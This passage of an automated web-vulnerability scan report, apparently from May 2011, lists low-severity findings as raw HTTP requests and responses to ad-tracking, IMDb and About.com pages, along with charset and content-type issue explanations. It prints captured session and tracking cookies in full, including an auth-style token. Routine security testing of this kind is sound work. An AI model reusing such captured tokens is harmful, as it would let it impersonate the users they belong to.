Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1656
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
20.27. http://tags.bluekai.com/site/3307  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3307

Request

GET /site/3307?ret=html&phint=Channel%3DSports&phint=SubChannel%3DFight%2520Sports&phint=Place%3DNational&phint=Section%3DFight%2520Sports&phint=WriterTopic%3DFight%2520Sports%2520Examiner&phint=Topic%3DFight%2520Sports&phint=__bk_t%3DComplete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20'face'%20and%20new%20feuds%20-%20National%20Fight%20Sports%20%7C%20Examiner.com&phint=__bk_k%3DWWE%2C%20WWE%20SmackDown&limit=7&r=32920141 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:33:33 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=foMj7Fd1lTmVIHOf; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeF2u1pW6GVaZGZKVHkQHPaA8Nb02WLVBeMENYDKLCYnvuyARthA+D6K0LB1tP+/fqstoHupCZ5rKIzpqN2m+dFFq4qb9VVCGefMNgG9eE/yXqBWS4Xqqpu84BBXFubxdprwVaXm3B5efEpHNeZXXPUcze7e7ehbat4NvTjzNIXxzF+9a9owq551rSXIYTek1F90TlllvWt8XVoBwOsXdmW2fS6Rtwril2fQs9EmB+dS7FDZwwiqO2xcc1GncodMDmjXIvRdMmqzTCZFSB5vcBKFWqn2EWyZeewhUxP83kd1kDBm2c5X7Jsrte144awwfebbg95P11zakGrs71dSKbn6pHfrwylFTz5cVM7RtlKhUIqxSPO; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQScCytkKPxHnvWZv/aVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EYL4UMSk84CekYLomSQnhBesaY5e4XIGeGq/1LDpwnZCSCMjAiWLkQR3GYt7P0090Cgp1f9L9d19QekGuHu; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2gPWWDhSz/vsqUaJSORsWf1cdFp96oL38gPa0V5jmDYVXZ1XlYokMKFZe+JNMXYZZY/DN9YNWDWDmSBwA9Pi/t5ZZ2f2ALZKg0mI41w5yk2FWKGd40fGdIWF+1XhNVELSEyt30VU6M2/Ux/hjkAkg/hcDC1pKhzO02Wp0eCZYpa9ZQtdiddF4goY0RhJ6wQjrzn92Y9LzDAA2KsOObdrrDdaKnvIlvJ6JdYENQtQA9PBGTvbttGYlr+EbxFnvXABCGWFlkJZWAKZP9mVDLmv79qpq0ZXUWbz2nxZXJwVxTcOfafRW+7b77CULXBgm+AHGCkcZyBH62b5bL7jwlZn0ggBFoMUg2lScGk5VglQLln4zC5sqEIwHylwH3+IGu2Un+xDCD07A3/dlXppruN231+PQNuvc3FeRfL2ljEFKYIcVfqr/9qnesY37GZA/WpasYe0jQpOehIdLpXF8rNXz+GiN0XLQwx+nza/Qz/yCr1jLzeBGRXsY2dFFAd3NEdxBTeT9O; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpqjLg9T1qjpcYO7RsOizcmAGsOAKWNMfxT9TmUnx1xBemz9Jn1/Yjx8MFwOOBsOiWfC9yEiG0qwRM5eOPekZklRsO/AtCZu9snFUH9tswrMWFwByXQCyFiBARsHZXx0zkNReGe9y9fkhZh; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:33:33 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 375
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1183324&t=2" width=1 height=1 border=0 alt="">
<img src="http://sync.mathtag.com/sync/img?m
...[SNIP]...
20.28. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://urbanlegends.about.com
Path:   /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

Request

GET /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm HTTP/1.1
Host: urbanlegends.about.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=13

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:10 GMT
Content-Type: text/html
Content-Length: 27113

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta name="docset" content="6"><meta http-equiv="Set-Cookie" content="Mint=B5CDWA1G
...[SNIP]...
20.29. http://w55c.net/ct/cms-2-frame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w55c.net
Path:   /ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC
If-None-Match: "1548528128"
If-Modified-Since: Fri, 22 Apr 2011 22:39:41 GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Thu, 12 May 2011 14:28:30 GMT
Vary: Accept-Encoding
Last-Modified: Fri, 22 Apr 2011 22:57:11 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Date: Thu, 12 May 2011 13:28:30 GMT
Server: w55c.net
Content-Length: 3621

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...
20.30. http://www.greenfieldreporter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenfieldreporter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.greenfieldreporter.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=c7053afee9bb783895611dfb497d343c; __utmz=176006388.1305207031.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=176006388.1481856502.1305207031.1305207031.1305207031.1; __utmc=176006388; __utmb=176006388.1.10.1305207031; __gads=ID=e4eefe30169b08f2:T=1305207031:S=ALNI_MbpEPNlG5_gIkvIRIDI4e1kI-EOOw; _chartbeat2=fj95xfkees6cbbr0

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:33:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...
20.31. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

Request

GET /images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:20 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 05:35:48 GMT
ETag: "9b4-4a2f971e17500"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:32:20 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 2484

<html>
<head>
<!--
Version: 2.0
Purpose: this page helps to load a sequence of javascript and swf files
for use by a parent document.
Dependencies:
1) must be loaded from an iframe, with the same
...[SNIP]...
20.32. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

Request

GET /images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:22 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 05:35:47 GMT
ETag: "b6-4a2f971d232c0"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:32:22 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 182

<html><head>
<style>body{ background:transparent; }</style>
</head><body>
<script type="text/javascript">parent.ad_utils.render_ad(document, window);</script>
</body></html>
20.33. http://www.imdb.com/images/a/ifb/google_afc_labs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/a/ifb/google_afc_labs.html

Request

GET /images/a/ifb/google_afc_labs.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:28 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 05:35:48 GMT
ETag: "999-4a2f971e17500"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:32:28 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 2457

<html>
<head>

<script type="text/javascript">
var loc = document.location.toString();
var args_idx = loc.indexOf("#");
if (args_idx != -1) {
var args_str = loc.substring(args_idx + 1);

var a
...[SNIP]...
20.34. http://www.imdb.com/images/a/ifb/pda_comm2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/a/ifb/pda_comm2.html

Request

GET /images/a/ifb/pda_comm2.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047; us=s%3D939%3Bs%3D534%3Bs%3D944%3Bs%3D67%3Bs%3D24%3Bs%3D143%3Bs%3D1009%3Bs%3D32%3Bs%3D16%3Bs%3Dc1%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc3%3Bs%3Dc1%3Bs%3Dc2%3B; __utmz=168836921.1305207064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1717137058.1305207064.1305207064.1305207064.1; __utmb=168836921.0.10.1305207064; __utmc=168836921; __utmv=168836921.Falkor

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:17 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 21:11:58 GMT
ETag: "69-4a30685dfa380"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:33:17 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 105

<html><body><script src="http://g-ecx.images-amazon.com/images/G/01/pda/pda.js"></script></body></html>
20.35. http://www.imdb.com/title/tt0758746/_ajax/footer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /title/tt0758746/_ajax/footer

Request

GET /title/tt0758746/_ajax/footer HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047; us=s%3D939%3Bs%3D534%3Bs%3D944%3Bs%3D67%3Bs%3D24%3Bs%3D143%3Bs%3D1009%3Bs%3D32%3Bs%3D16%3Bs%3Dc1%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc3%3Bs%3Dc1%3Bs%3Dc2%3B; __utmz=168836921.1305207064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1717137058.1305207064.1305207064.1305207064.1; __utmb=168836921.0.10.1305207064; __utmc=168836921; __utmv=168836921.Falkor

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:55 GMT
Server: Server
Cache-Control: private
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 28375


<div class="article" >


<h2>Frequently Asked Questions</h2>

<div class="faq">
<div class="odd">
<b>Q:</b>
<a onclick="(new Image()).src='/rg/title-tease/faq-question/images/b.gif?link=
...[SNIP]...
20.36. http://z.about.com/6g/ip/284/27.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://z.about.com
Path:   /6g/ip/284/27.htm

Request

GET /6g/ip/284/27.htm?s=urbanlegends HTTP/1.1
Host: z.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1; pc=1; zFD=B5C1B5310B50220B00202; zRf=-2; gs=urbanlegends

Response

HTTP/1.1 200 OK
Age: 2970
Date: Thu, 12 May 2011 12:43:16 GMT
Expires: Thu, 12 May 2011 13:43:17 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
ETag: "KXDIJCDIDLNWSKTPP"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Keep-Alive: timeout=15, max=99
Content-Type: text/html
Content-Length: 2257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>About.com Special Features</title></head>
<style>html, body, div, span, h3, h4
...[SNIP]...
21. HTML uses unrecognised charset  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.merchantpromotions.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET / HTTP/1.1
Host: www.merchantpromotions.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.9
Content-Type: text/html; charset=shift_jis
Content-Length: 5004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
<head>
<title>...
...[SNIP]...
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="content-type" content="text/html; charset=Shift_JIS" />
<link rel="stylesheet" type="text/css" media="all" href="/tax_av.css" />
...[SNIP]...
22. Content type incorrectly stated  previous  next
There are 36 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

